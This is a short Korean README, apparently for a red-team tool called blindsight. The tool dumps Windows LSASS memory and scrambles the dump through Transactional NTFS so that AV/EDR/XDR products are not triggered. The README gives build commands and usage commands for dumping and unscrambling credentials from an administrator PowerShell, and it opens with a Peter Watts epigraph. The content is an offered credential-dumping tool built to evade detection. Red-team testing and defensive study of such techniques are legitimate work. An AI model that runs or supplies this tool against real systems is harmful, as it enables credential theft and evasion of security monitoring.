
기본 대응 조치를 우회하여 LSASS 메모리를 덤프하는 레드 팀 도구
"적자생존이라는 것은 없다.
어쩌면 가장 적절한 자의 생존일지도 모른다.
해결책이 최적인지는 중요하지 않다.
중요한 것은 대안을 이기느냐이다."-- Peter Watts, Blindsight (2006)
LSASS 메모리를 덤프하고 기본 대응 조치를 우회하는 레드팀 도구입니다. TxF(Transactional NTFS) API를 사용해 메모리 덤프를 투명하게 스크램블하여 AV/EDR/XDR을 트리거하지 않도록 합니다.
$ brew install mingw-w64
$ rustup target add x86_64-pc-windows-gnu
$ cargo build --release --target x86_64-pc-windows-gnu
관리자 PowerShell 창에서:
C:\> .\blindsight.exe [dump | file_to_unscramble.log]
LSASS 메모리 덤프:
C:\> .\blindsight.exe
메모리 덤프 스크램블 해제:
C:\> .\blindsight.exe 29ABE9Hy.log
[!CAUTION] 프로덕션 서버에서 테스트하지 마십시오. LSASS에 접근하면 시스템이 불안정해질 수 있습니다!